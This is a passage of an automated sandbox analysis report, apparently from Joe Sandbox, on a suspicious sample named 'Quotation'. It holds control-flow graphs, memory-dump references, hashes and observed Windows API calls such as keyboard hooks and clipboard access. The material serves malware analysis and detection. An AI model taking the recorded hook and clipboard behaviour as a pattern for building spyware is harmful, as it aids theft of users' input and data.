d8bb5-d8bb8 174->178 177->178 183 d8bba-d8be0 178->183 184 d8be5-d8be8 178->184 183->184 187 d8bea-d8c10 184->187 188 d8c15-d8c18 184->188 187->188 193 d8c1a-d8c40 188->193 194 d8c45-d8c48 188->194 193->194 197 d8c4a-d8c60 194->197 198 d8c65-d8c68 194->198 197->198 203 d8c6a-d8c90 198->203 204 d8c95-d8c98 198->204 203->204 207 d8c9a-d8cc0 204->207 208 d8cc5-d8cc8 204->208 207->208 213 d8cca-d8cf0 208->213 214 d8cf5-d8cf8 208->214 213->214 217 d8cfa-d8d20 214->217 218 d8d25-d8d28 214->218 217->218 223 d8d2a-d8d50 218->223 224 d8d55-d8d58 218->224 223->224 227 d8d5a-d8d80 224->227 228 d8d85-d8d88 224->228 227->228 231 d8d8a-d8db0 228->231 232 d8db5-d8db8 228->232 231->232 236 d8dba-d8de0 232->236 237 d8de5-d8de8 232->237 236->237 241 d8dea-d8e10 237->241 242 d8e15-d8e18 237->242 241->242 246 d8e1a-d8e40 242->246 247 d8e45-d8e48 242->247 246->247 251 d8e4a-d8e70 247->251 252 d8e75-d8e78 247->252 251->252 256 d8e7a-d8ea0 252->256 257 d8ea5-d8ea8 252->257 256->257 261 d8eaa-d8eb6 257->261 262 d8ec3-d8ec6 257->262 280 d8ebe 261->280 269 d8ec8-d8eee 262->269 270 d8ef3-d8ef5 262->270 269->270 271 d8efc-d8eff 270->271 272 d8ef7 270->272 271->65 279 d8f05-d8f0b 271->279 272->271 280->262 285->106 286->106 287->106
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8C8$@ C8$`C8$`"C8$p$C8
                                                                                    • API String ID: 0-1737807598
                                                                                    • Opcode ID: 8736ad570d29e5befe62fe813fbcf4fe134cb35d1bf7b7bb10b4b01d6b8f5a9b
                                                                                    • Instruction ID: cfa1ec9d481eb62cade97f62a0a3eda742bbe364a22faecd298863db541e2ebc
                                                                                    • Opcode Fuzzy Hash: 8736ad570d29e5befe62fe813fbcf4fe134cb35d1bf7b7bb10b4b01d6b8f5a9b
                                                                                    • Instruction Fuzzy Hash: 4822B2707012099BEB29DB38C45625C73E2FBCA364B208A3AE045DB741CFB5DD578BA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 288 d8729-d873b 289 d873c-d873f 288->289 290 d8741-d8744 289->290 291 d8746-d874c 290->291 292 d8771-d8774 290->292 301 d874e-d876c 291->301 302 d86f7-d871f 291->302 293 d8776-d879c 292->293 294 d87a1-d87a4 292->294 293->294 295 d87a6-d87cc 294->295 296 d87d1-d87d4 294->296 295->296 298 d87d6-d87fc 296->298 299 d8801-d8804 296->299 298->299 303 d8806-d882c 299->303 304 d8831-d8834 299->304 301->292 302->289 303->304 306 d8836-d885c 304->306 307 d8861-d8864 304->307 306->307 313 d8866-d888c 307->313 314 d8891-d8894 307->314 313->314 318 d88a5-d88a8 314->318 319 d8896-d8898 314->319 324 d88aa 318->324 325 d88b5-d88b8 318->325 508 d889a call d9f70 319->508 509 d889a call d9f80 319->509 510 d889a call da023 319->510 337 d88b0 324->337 332 d88ba-d88e0 325->332 333 d88e5-d88e8 325->333 329 d88a0 329->318 332->333 335 d88ea-d8910 333->335 336 d8915-d8918 333->336 335->336 340 d891a-d8940 336->340 341 d8945-d8948 336->341 337->325 340->341 344 d894a-d8970 341->344 345 d8975-d8978 341->345 344->345 347 d897a-d89a0 345->347 348 d89a5-d89a8 345->348 347->348 351 d89aa-d89d0 348->351 352 d89d5-d89d8 348->352 351->352 356 d89da-d8a00 352->356 357 d8a05-d8a08 352->357 356->357 360 d8a0a-d8a30 357->360 361 d8a35-d8a38 357->361 360->361 366 d8a3a-d8a60 361->366 367 d8a65-d8a68 361->367 366->367 370 d8a6a-d8a90 367->370 371 d8a95-d8a98 367->371 370->371 376 d8a9a-d8ac0 371->376 377 d8ac5-d8ac8 371->377 376->377 380 d8aca-d8af0 377->380 381 d8af5-d8af8 377->381 380->381 386 d8afa-d8b20 381->386 387 d8b25-d8b28 381->387 386->387 390 d8b2a-d8b50 387->390 391 d8b55-d8b58 387->391 390->391 396 d8b5a-d8b80 391->396 397 d8b85-d8b88 391->397 396->397 400 d8b8a-d8bb0 397->400 401 d8bb5-d8bb8 397->401 400->401 406 d8bba-d8be0 401->406 407 d8be5-d8be8 401->407 406->407 410 d8bea-d8c10 407->410 411 d8c15-d8c18 407->411 410->411 416 d8c1a-d8c40 411->416 417 d8c45-d8c48 411->417 416->417 420 d8c4a-d8c60 417->420 421 d8c65-d8c68 417->421 420->421 426 d8c6a-d8c90 421->426 427 d8c95-d8c98 421->427 426->427 430 d8c9a-d8cc0 427->430 431 d8cc5-d8cc8 427->431 430->431 436 d8cca-d8cf0 431->436 437 d8cf5-d8cf8 431->437 436->437 440 d8cfa-d8d20 437->440 441 d8d25-d8d28 437->441 440->441 446 d8d2a-d8d50 441->446 447 d8d55-d8d58 441->447 446->447 450 d8d5a-d8d80 447->450 451 d8d85-d8d88 447->451 450->451 454 d8d8a-d8db0 451->454 455 d8db5-d8db8 451->455 454->455 459 d8dba-d8de0 455->459 460 d8de5-d8de8 455->460 459->460 464 d8dea-d8e10 460->464 465 d8e15-d8e18 460->465 464->465 469 d8e1a-d8e40 465->469 470 d8e45-d8e48 465->470 469->470 474 d8e4a-d8e70 470->474 475 d8e75-d8e78 470->475 474->475 479 d8e7a-d8ea0 475->479 480 d8ea5-d8ea8 475->480 479->480 484 d8eaa-d8eb6 480->484 485 d8ec3-d8ec6 480->485 503 d8ebe 484->503 492 d8ec8-d8eee 485->492 493 d8ef3-d8ef5 485->493 492->493 494 d8efc-d8eff 493->494 495 d8ef7 493->495 494->290 502 d8f05-d8f0b 494->502 495->494 503->485 508->329 509->329 510->329
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8C8$@ C8$`C8$`"C8$p$C8
                                                                                    • API String ID: 0-1737807598
                                                                                    • Opcode ID: 8fa8f438e52e4750204c28c7cef716fc4b057852f672477d0a15931154f37ee4
                                                                                    • Instruction ID: 413ef86656c022a8f476b4d7dcb313dd51b5e8a3b1ed1124c2c7ca998e805757
                                                                                    • Opcode Fuzzy Hash: 8fa8f438e52e4750204c28c7cef716fc4b057852f672477d0a15931154f37ee4
                                                                                    • Instruction Fuzzy Hash: 6412A1707012099BDB29DB38C45626C73E2FBCA365B208A3AE045DB741CFB5ED539B91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1280 d0838-d084c 1282 d084e-d0851 1280->1282 1283 d08d5-d08d8 1282->1283 1284 d0857-d0867 1282->1284 1285 d08e9-d08ec 1283->1285 1286 d08da 1283->1286 1290 d0899-d08a1 1284->1290 1291 d0869-d0897 1284->1291 1288 d08ee call d1382 1285->1288 1289 d08f9-d08fc 1285->1289 1292 d08e4 1286->1292 1297 d08f4 1288->1297 1293 d08fe call 39799ee8 1289->1293 1294 d0909-d090b 1289->1294 1298 d08a7-d08a9 1290->1298 1299 d08a3-d08a5 1290->1299 1291->1290 1292->1285 1301 d0904 1293->1301 1295 d090d 1294->1295 1296 d0912-d0915 1294->1296 1295->1296 1296->1282 1302 d091b-d091d 1296->1302 1297->1289 1300 d08af-d08b1 1298->1300 1299->1300 1304 d08c9-d08d0 1300->1304 1305 d08b3-d08b9 1300->1305 1301->1294 1304->1283 1306 d08bd-d08bf 1305->1306 1307 d08bb 1305->1307 1306->1304 1307->1304
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5$ #6H*6$Ko
                                                                                    • API String ID: 0-3163116277
                                                                                    • Opcode ID: c0f491d5003835cf70730556fa8346c2f92887a5afee336d072aafd270354894
                                                                                    • Instruction ID: 434ba726de85bbc548d5c96f7425ace0b1754499ed496abfba5d09f362f79bae
                                                                                    • Opcode Fuzzy Hash: c0f491d5003835cf70730556fa8346c2f92887a5afee336d072aafd270354894
                                                                                    • Instruction Fuzzy Hash: 9111C630B003055BEFA056B9C8143693B95EB56725F10497BD0CADB382DE64CD829FF5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2040 da070-da098 2042 da09a-da09d 2040->2042 2043 da09f-da0bb 2042->2043 2044 da0c0-da0c3 2042->2044 2043->2044 2045 da0fc-da0fe 2044->2045 2046 da0c5-da0f7 2044->2046 2047 da105-da108 2045->2047 2048 da100 2045->2048 2046->2045 2047->2042 2050 da10a-da119 2047->2050 2048->2047 2053 da11b-da122 2050->2053 2054 da15a-da16f 2050->2054 2056 da149-da158 2053->2056 2057 da124-da12a 2053->2057 2058 da170 2054->2058 2056->2053 2056->2054 2061 da130 call da4ae 2057->2061 2062 da130 call da266 2057->2062 2063 da130 call da2b0 2057->2063 2058->2058 2059 da136-da141 2059->2056 2061->2059 2062->2059 2063->2059
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @1C8$@1C8
                                                                                    • API String ID: 0-2510050408
                                                                                    • Opcode ID: 6aff5b21efe736b5485921f64d074cdfefe91282724b9304d11461be4196fd4a
                                                                                    • Instruction ID: fe5e353563e23302d542d525dba312be0f71f56e2f1da2926b383a2ed0c1540a
                                                                                    • Opcode Fuzzy Hash: 6aff5b21efe736b5485921f64d074cdfefe91282724b9304d11461be4196fd4a
                                                                                    • Instruction Fuzzy Hash: 7B315030E002099BDB15CFA9C85569EFBB2BF8A310F148616E405BB341EB759C46CBA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @1C8$@1C8
                                                                                    • API String ID: 0-2510050408
                                                                                    • Opcode ID: de21360a55365fed47f99b0cd21c2ed61dd6355aa8d2c265d4b9c4437804f063
                                                                                    • Instruction ID: 3eed9c145081dd6e091ed216d8a49495516854d2801834b31d60c4accd787245
                                                                                    • Opcode Fuzzy Hash: de21360a55365fed47f99b0cd21c2ed61dd6355aa8d2c265d4b9c4437804f063
                                                                                    • Instruction Fuzzy Hash: AE215334E002099BDB15CF69D85569EFBB2FF8A300F14C616E405BB341DB759C45CB61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: D0C8$D0C8
                                                                                    • API String ID: 0-2323314842
                                                                                    • Opcode ID: eb1c83131dbce8e2e6e61365a589962fa380d9a38c0b588f2435e1e99092468b
                                                                                    • Instruction ID: 051b3981cb250b9fb88ff7f45b393722f85f6ae65a6079aa7c8e80daf53338d5
                                                                                    • Opcode Fuzzy Hash: eb1c83131dbce8e2e6e61365a589962fa380d9a38c0b588f2435e1e99092468b
                                                                                    • Instruction Fuzzy Hash: 46215130E103199BCB14CFA4D45069EB7B2BF89300F20862BE815F7351EB74AD45CB61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: D0C8$D0C8
                                                                                    • API String ID: 0-2323314842
                                                                                    • Opcode ID: 9e90d742aee3e89e3e25fb280a9af45bd0d5914fcb6175a6d8cf9bbdc1c49b44
                                                                                    • Instruction ID: fa71cab97205253fa91e5b71ef21fd2e0e7d11cd4f9b06c3a8964975efc425a5
                                                                                    • Opcode Fuzzy Hash: 9e90d742aee3e89e3e25fb280a9af45bd0d5914fcb6175a6d8cf9bbdc1c49b44
                                                                                    • Instruction Fuzzy Hash: 05213030E103199BCB14CFA4D85069EBBB2BF89300F20862BE915F7350EB7498458B61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #6H*6$Ko
                                                                                    • API String ID: 0-4254942743
                                                                                    • Opcode ID: 6a4bc712b8af1c5dd784f552ef6db9ad9ac2cda1485a25f1a18a462fd0f309b7
                                                                                    • Instruction ID: 0cd7f9bf580c7ba168a27718a3c1f94dbd6db9e897c549f9780164fb116cf89a
                                                                                    • Opcode Fuzzy Hash: 6a4bc712b8af1c5dd784f552ef6db9ad9ac2cda1485a25f1a18a462fd0f309b7
                                                                                    • Instruction Fuzzy Hash: 93119430B003099BEFA49679C85476937D2EB99721F10497BD08ACB352DE65CC829BE5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PJ'q
                                                                                    • API String ID: 0-1786981223
                                                                                    • Opcode ID: fb2e6667920cdfd8e2ce7931d947f65f9c92cde58cdf7f8f16159e3397ef74fe
                                                                                    • Instruction ID: 5a50a94679cc1c91e06f18c3aa441fc033c9b2072ed28ea0e826c021fbf1c921
                                                                                    • Opcode Fuzzy Hash: fb2e6667920cdfd8e2ce7931d947f65f9c92cde58cdf7f8f16159e3397ef74fe
                                                                                    • Instruction Fuzzy Hash: 27E14B34A00359CFDB64DB69C490AADBBF2BF89710F20852AE406EB351CB35DD46DB61
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3979248A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 778d5f65fc07e4360387260542b1a8b3a8524d48919e1a61a76927dabefc6119
                                                                                    • Instruction ID: 44bf89a0abaad78bb32e318eaf5ca551737102ec54a9a074c278410e70bb7ca2
                                                                                    • Opcode Fuzzy Hash: 778d5f65fc07e4360387260542b1a8b3a8524d48919e1a61a76927dabefc6119
                                                                                    • Instruction Fuzzy Hash: 6451C0B5D103499FDB14CFAAD884ADEBFB1FF48314F24812AE418AB250D775A845CF91
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3979248A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: e84eeb3f5edaa95a72308c1e99160edec2b8779f90701a070c9b14d8c580b827
                                                                                    • Instruction ID: 671a157de696ea7710713b925b4c26884cf7143b55b01e3db51d38d8eba9e42e
                                                                                    • Opcode Fuzzy Hash: e84eeb3f5edaa95a72308c1e99160edec2b8779f90701a070c9b14d8c580b827
                                                                                    • Instruction Fuzzy Hash: 3A41C0B5D103099FDB14CF9AD884ADEBFB5FF48314F20812AE418AB250D775A885CF91
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 39797029
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: 379ce039468e29a037a233129bfe25a9c07665055f92aaa7f2c6b65a53f02144
                                                                                    • Instruction ID: 34b9f630177ca341403e3018ad0e5758529ef062f1fbdea79e9976bebaf4c9df
                                                                                    • Opcode Fuzzy Hash: 379ce039468e29a037a233129bfe25a9c07665055f92aaa7f2c6b65a53f02144
                                                                                    • Instruction Fuzzy Hash: 8A4138B4910309CFDB10CF59D484BEABBF5FB88314F248459E518AB360D775A941CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: a964c7c5668a4b9c3d47d6ca30c682aafad3b8287b6ab793cb544a1fdaf33ef3
                                                                                    • Instruction ID: a468bd07a4a7bfa9c554c609a78378b4b1ee3a883528fbaa5ab827844ae303f3
                                                                                    • Opcode Fuzzy Hash: a964c7c5668a4b9c3d47d6ca30c682aafad3b8287b6ab793cb544a1fdaf33ef3
                                                                                    • Instruction Fuzzy Hash: C421AC759253888FDB20CFAED5817DEBBF4EB09324F10446AE449EB791C375A844CBA1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard
                                                                                    • String ID:
                                                                                    • API String ID: 220874293-0
                                                                                    • Opcode ID: d7d982e9192434255ae378948de0963ddacaa44e20d61536df132f63f3a49643
                                                                                    • Instruction ID: 65fd208b55d56c60e0d79dd3f90266bc7e0e362a530a6ea5e675dff53ca5f1d3
                                                                                    • Opcode Fuzzy Hash: d7d982e9192434255ae378948de0963ddacaa44e20d61536df132f63f3a49643
                                                                                    • Instruction Fuzzy Hash: 0331CFB0911248DFEB14CFA9D984BDEBBB5BB48304F248469E404AB290D7B5A985CF51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard
                                                                                    • String ID:
                                                                                    • API String ID: 220874293-0
                                                                                    • Opcode ID: f88a3fcc892daeea18c5f2331f85d8eb17c737a3952255621406bc202f7f59e1
                                                                                    • Instruction ID: 0225039395c3e1e19f107ef7293fd2a588bf01c70044fb2c5b1b669fe2eae38f
                                                                                    • Opcode Fuzzy Hash: f88a3fcc892daeea18c5f2331f85d8eb17c737a3952255621406bc202f7f59e1
                                                                                    • Instruction Fuzzy Hash: 0B31DEB0911248DFEB14CF99D984BDEBBB5BF48314F208059E404AB390DBB5A885CFA1
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39796157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 5c52e0ba351c3bd42e797587d8c7af5aaaf5af33357a941e772e37f0bbfa27b8
                                                                                    • Instruction ID: 713731881f3f166bb2ecda45f7eea49a4b283a6d66f13d3223057f640310e352
                                                                                    • Opcode Fuzzy Hash: 5c52e0ba351c3bd42e797587d8c7af5aaaf5af33357a941e772e37f0bbfa27b8
                                                                                    • Instruction Fuzzy Hash: C921E5B59002489FDB10CFAAD884ADEFFF5FB48324F14845AE958A7350D374A950CFA5
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39796157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 2bd390b7b22f5a1236987b4bfb8c34398e6e7f47f7f19cf95a57986aa9af379b
                                                                                    • Instruction ID: 8bf087c053c6b0bfdc60d9e4adbc37c320a83480302ef99931e38ee6b86531a1
                                                                                    • Opcode Fuzzy Hash: 2bd390b7b22f5a1236987b4bfb8c34398e6e7f47f7f19cf95a57986aa9af379b
                                                                                    • Instruction Fuzzy Hash: F721C2B5D00248AFDB10CFAAD984ADEFBF4FB48324F14841AE958A7350D374A950CFA5
                                                                                    APIs
                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3979986B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: HookWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2559412058-0
                                                                                    • Opcode ID: bf07f4c3d5c6409a365b5c97b4d2de161120f76e2de79f538208fffe34d19a89
                                                                                    • Instruction ID: 3a04e42d7f3ea69bd334c9e68ef28eb406e255de6f7c5a4ac43c35c7ef1e1e47
                                                                                    • Opcode Fuzzy Hash: bf07f4c3d5c6409a365b5c97b4d2de161120f76e2de79f538208fffe34d19a89
                                                                                    • Instruction Fuzzy Hash: C82107B5D002099FDB14CF9AD844BDEBBF5EB88320F10842AE459A7290C774A940CFA5
                                                                                    APIs
                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3979986B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: HookWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2559412058-0
                                                                                    • Opcode ID: cfdaad679e5aa7732ac20bd94e962d595cc3c09ad492b1e9363286615dfdc32f
                                                                                    • Instruction ID: f902a8748ac86fc5cf1fcd9f01ec9d161cc613f1a52b366e6df271d77dc4c3b1
                                                                                    • Opcode Fuzzy Hash: cfdaad679e5aa7732ac20bd94e962d595cc3c09ad492b1e9363286615dfdc32f
                                                                                    • Instruction Fuzzy Hash: EF21E4B5D002099FDB14CFAAD844BEEBBF5EB88310F10842AE459A7290C774A940CFA5
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,39797275), ref: 397972FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 3704973fffacc68c787958c863e02b01bb2a699268590c689047d0fe3b37df8c
                                                                                    • Instruction ID: a8743d5e8deddcf104dd8b6ab11cb1e127a4a3fbab9c0134c89250ae0f3a8577
                                                                                    • Opcode Fuzzy Hash: 3704973fffacc68c787958c863e02b01bb2a699268590c689047d0fe3b37df8c
                                                                                    • Instruction Fuzzy Hash: 9F1133B18003488FCB20CF9AD445BDEBBF4EB48324F20845AE918A7740D374A940CFA5
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 39797BBD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 989c61b236e65408d3cf03cfe89c1186eee8506128ac1361c2d79bf564cdbb0e
                                                                                    • Instruction ID: 9d8ed3b9a8b5e6079391e2d2bffb1fa8930b0c4bd8074f80fe4de61c580d214c
                                                                                    • Opcode Fuzzy Hash: 989c61b236e65408d3cf03cfe89c1186eee8506128ac1361c2d79bf564cdbb0e
                                                                                    • Instruction Fuzzy Hash: 121142B1C007488FDB20CFAAD445BDEBBF4EB48324F20846AE559A7740D374A940CFA9
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 39797BBD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2625370614.0000000039790000.00000040.00000800.00020000.00000000.sdmp, Offset: 39790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_39790000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 3288b7ce7032944fedac362ed27c1569a1700dec8797398ae7dd83d2016c9bf7
                                                                                    • Instruction ID: cbdeca0249c3ddd9d0bc7ffef3ddc0d8bf58367c1f61bdfc0f0526ac56a04af2
                                                                                    • Opcode Fuzzy Hash: 3288b7ce7032944fedac362ed27c1569a1700dec8797398ae7dd83d2016c9bf7
                                                                                    • Instruction Fuzzy Hash: 28110DB5C003488FDB20CFAAD485BDEBBF4EB48324F20846AD559A7740D378A940CFA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \Vgm
                                                                                    • API String ID: 0-3507608961
                                                                                    • Opcode ID: 288443a97b02e70b1bb1b86982358282b20e4f3eef6db88478817a03b3d252ce
                                                                                    • Instruction ID: b01e70e4212130140c72797a75b048c8cbad7b0b334ce8530a143552fba3738f
                                                                                    • Opcode Fuzzy Hash: 288443a97b02e70b1bb1b86982358282b20e4f3eef6db88478817a03b3d252ce
                                                                                    • Instruction Fuzzy Hash: E1913970E00309DFDB60CFA9D8857EEBBF1AF48714F14812AE415A7354EB749985CBA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2596777509.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d0000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H*6
                                                                                    • API String ID: 0-3622659372
                                                                                    • Opcode ID: d5d4679c3156d889505fd0b3bd2446fa57ca1709096868c5379589af6253dd82
